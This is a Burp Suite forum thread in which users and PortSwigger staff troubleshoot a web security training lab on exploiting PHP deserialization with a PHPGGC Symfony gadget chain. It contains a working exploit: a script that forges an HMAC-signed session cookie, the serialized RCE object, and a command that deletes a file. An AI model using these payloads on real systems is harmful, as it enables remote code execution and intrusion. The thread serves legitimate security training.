Burp Suite User Forum


Exploiting PHP deserialization with a pre-built gadget chain

danBogom | Last updated: Apr 27, 2022 09:08PM UTC

Hello, I have a problem with this lab. When I send my payload I get the following error:

<div class="container"> <header class="navigation-header"> </header> <h4>Internal Server Error: Symfony Version: 4.3.6</h4> <p class=is-warning>PHP Fatal error: Uncaught Error: Call to a member function commit() on null in /usr/local/envs/php-symfony-4.3.6/vendor/symfony/symfony/src/Symfony/Component/Cache/Adapter/TagAwareAdapter.php:142 Stack trace: #0 /usr/local/envs/php-symfony-4.3.6/vendor/symfony/symfony/src/Symfony/Component/Cache/Adapter/TagAwareAdapter.php(286): Symfony\Component\Cache\Adapter\TagAwareAdapter-&gt;invalidateTags() #1 /usr/local/envs/php-symfony-4.3.6/vendor/symfony/symfony/src/Symfony/Component/Cache/Adapter/TagAwareAdapter.php(291): Symfony\Component\Cache\Adapter\TagAwareAdapter-&gt;commit() #2 [internal function]: Symfony\Component\Cache\Adapter\TagAwareAdapter-&gt;__destruct() #3 Command line code(10): unserialize() #4 {main} thrown in /usr/local/envs/php-symfony-4.3.6/vendor/symfony/symfony/src/Symfony/Component/Cache/Adapter/TagAwareAdapter.php on line 142</p> </div>

I reviewed my payload several times and can't find where I may have made a mistake. Then I tried to submit my solution after a lab environment restart and had the same error.

Ben, PortSwigger Agent | Last updated: Apr 28, 2022 07:51AM UTC

Hi Denis, Just to confirm, you are seeing this as a result of the request containing the malicious cookie that you have created in step 8 of the solution? If so, are you able to provide us with details of the script that you are using to create the malicious cookie and what request you are sending in Repeater so that we can take a look at this for you?

danBogom | Last updated: Apr 28, 2022 08:56AM UTC

Hi. To generate the payload, I used the script that was in the solution:

<?php
$object = base64_encode(./phpggc Symfony/RCE4 exec 'rm /home/carlos/morale.txt');
$secretKey = SECRET_KEY;
$cookie = urlencode('{"token":"' . $object . '","sig_hmac_sha1":"' . hash_hmac('sha1', $object, $secretKey) . '"}');
echo $cookie;
?>

And provided this payload through session=%7B%22token%22%3A%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%22%2C%22sig_hmac_sha1%22%3A%2282ee1fd1a43bf4ddf718e8ce61614f805e73798a%22%7D

Hannah, PortSwigger Agent | Last updated: Apr 29, 2022 08:59AM UTC

Hi, Have you tried using PHPGGC separately to the rest of your PHP script, then inserting the output to the rest of the script? Additionally, have you had a look at any video solutions for this lab? You can find one here: https://www.youtube.com/watch?v=WmO8Kad0M7Y

danBogom | Last updated: Apr 29, 2022 09:08AM UTC

Hi. Of course I used PHPGGC separately and tested the video solution. I just showed what payload I generate for Base64 encoding; to test my PHPGGC output, just base64_decode the token I provided above.

PHPGGC payload:

O:47:"Symfony\Component\Cache\Adapter\TagAwareAdapter":2:{s:57:"Symfony\Component\Cache\Adapter\TagAwareAdapterdeferred";a:1:{i:0;O:33:"Symfony\Component\Cache\CacheItem":2:{s:11:"*poolHash";i:1;s:12:"*innerItem";s:26:"rm /home/carlos/morale.txt";}}s:53:"Symfony\Component\Cache\Adapter\TagAwareAdapterpool";O:44:"Symfony\Component\Cache\Adapter\ProxyAdapter":2:{s:54:"Symfony\Component\Cache\Adapter\ProxyAdapterpoolHash";i:1;s:58:"Symfony\Component\Cache\Adapter\ProxyAdaptersetInnerItem";s:4:"exec";}}

Liam, PortSwigger Agent | Last updated: May 11, 2022 09:25AM UTC

We're going to follow up with some additional testing. We'll get back to you ASAP. Thanks for your patience.

Liam, PortSwigger Agent | Last updated: May 12, 2022 09:37AM UTC

Hi Denis. We haven't been able to reproduce the issue you encountered. Are you still experiencing problems with this lab?

danBogom | Last updated: May 19, 2022 10:25AM UTC

Hi Tried again today and have the same problem: PHP Fatal error: Uncaught Error: Call to a member function commit() on null in /usr/local/envs/php-symfony-4.3.6/vendor/symfony/symfony/src/Symfony/Component/Cache/Adapter/TagAwareAdapter.php:142 Stack trace: #0 /usr/local/envs/php-symfony-4.3.6/vendor/symfony/symfony/src/Symfony/Component/Cache/Adapter/TagAwareAdapter.php(286): Symfony\Component\Cache\Adapter\TagAwareAdapter-&gt;invalidateTags() #1 /usr/local/envs/php-symfony-4.3.6/vendor/symfony/symfony/src/Symfony/Component/Cache/Adapter/TagAwareAdapter.php(291): Symfony\Component\Cache\Adapter\TagAwareAdapter-&gt;commit() #2 [internal function]: Symfony\Component\Cache\Adapter\TagAwareAdapter-&gt;__destruct() #3 Command line code(10): unserialize() #4 {main} thrown in /usr/local/envs/php-symfony-4.3.6/vendor/symfony/symfony/src/Symfony/Component/Cache/Adapter/TagAwareAdapter.php on line 142

Ben, PortSwigger Agent | Last updated: May 19, 2022 10:59AM UTC

Hi Denis, Just to confirm, you are running something similar to the following (the object value will remain consistent throughout different lab sessions whereas the secretKey will be unique to each lab session and will need to be obtained from the /cgi-bin/phpinfo.php request each time):

<?php
$object = "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";
$secretKey = "styx0w1ajtildyjeuznn370wa3f2i24m";
$cookie = urlencode('{"token":"' . $object . '","sig_hmac_sha1":"' . hash_hmac('sha1', $object, $secretKey) . '"}');
echo $cookie;

You are then taking the output of this script and using it to replace the cookie value in an existing request within Repeater (a request that contains the session cookie after you have logged in with the 'wiener' user)?

I have run through this process twice, using this site to run the script (https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler) and have been able to solve the lab using this approach both times.

Perhaps it might be easier if you send us an email to support@portswigger.net and include some screenshots of what you are doing at each stage so that we can see if we can spot anything out of the ordinary.

Pump | Last updated: Jun 19, 2023 03:56PM UTC

Thanks, I would like to know how this object was generated. $object = "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";

Ben, PortSwigger Agent | Last updated: Jun 20, 2023 06:46AM UTC

Hi, That is the Base-64 encoded object that is generated by using the PHPGGC tool (this is detailed in Step 7 of the written solution).

Lucian | Last updated: Aug 20, 2023 12:37PM UTC

I had the same problem as you. The solution is simple, you have to pipe the result of the phpggc command to a file and then apply Base64 on that file content instead of applying Base64 to the string copied from the console output. That is because there are some non-ASCII characters in the generated output that you will miss (you will not see them) when you copy the output from the console.
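
Added example (not part of Lucian's post or the lab solution): PHP's serialize() wraps private and protected property names in NUL bytes, which a terminal does not display, so text copied from the console no longer matches its declared `s:N:` lengths. The Python check below flags every string token whose declared length is wrong; the function names and the `Demo` sample object are constructed for illustration.

```python
import re

# Header of a PHP serialized string token: s:<declared byte length>:"
STRING_HEADER = re.compile(rb's:(\d+):"')


def mangled_name(class_name, prop, visibility="private"):
    """Property name as PHP serialize() stores it, including the NUL bytes."""
    if visibility == "private":
        return b"\x00" + class_name.encode() + b"\x00" + prop.encode()
    if visibility == "protected":
        return b"\x00*\x00" + prop.encode()
    return prop.encode()


def length_mismatches(data):
    """Return (offset, declared_length) for each string token whose body
    does not end with '";' exactly declared_length bytes after the quote."""
    bad, pos = [], 0
    while (m := STRING_HEADER.search(data, pos)):
        declared = int(m.group(1))
        end = m.end() + declared
        if data[end:end + 2] == b'";':
            pos = end + 2            # token is consistent, skip its body
        else:
            bad.append((m.start(), declared))
            pos = m.end()            # keep scanning inside the damaged region
    return bad


# Constructed sample: class Demo with one private property "name".
NAME = mangled_name("Demo", "name")
INTACT = b'O:4:"Demo":1:{s:%d:"%s";s:2:"hi";}' % (len(NAME), NAME)
# What survives a copy from the console: the same text with the NUL bytes gone.
PASTED = INTACT.replace(b"\x00", b"")

if __name__ == "__main__":
    print("intact:", length_mismatches(INTACT))
    print("pasted:", length_mismatches(PASTED))
    # The 57 declared in the thread's s:57:"...TagAwareAdapterdeferred" token
    # is the 55 visible characters plus two NUL bytes.
    cls = "Symfony\\Component\\Cache\\Adapter\\TagAwareAdapter"
    print(len(mangled_name(cls, "deferred")))
```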
